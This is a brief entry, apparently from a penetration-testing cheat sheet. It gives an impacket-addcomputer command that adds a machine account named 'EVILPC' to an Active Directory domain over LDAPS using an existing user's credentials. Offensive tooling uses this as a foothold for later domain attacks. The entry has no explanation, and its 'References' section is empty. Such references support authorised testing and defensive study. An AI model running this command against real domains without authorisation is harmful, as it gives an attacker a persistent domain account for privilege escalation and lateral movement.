Add a computer account to the domain, by method.
Command: Linux copy
impacket-addcomputer -dc-ip $IP -method LDAPS -computer-pass $NEWPASSWORD -computer-name EVILPC $DOMAIN/$USER:$PASSWORD
References: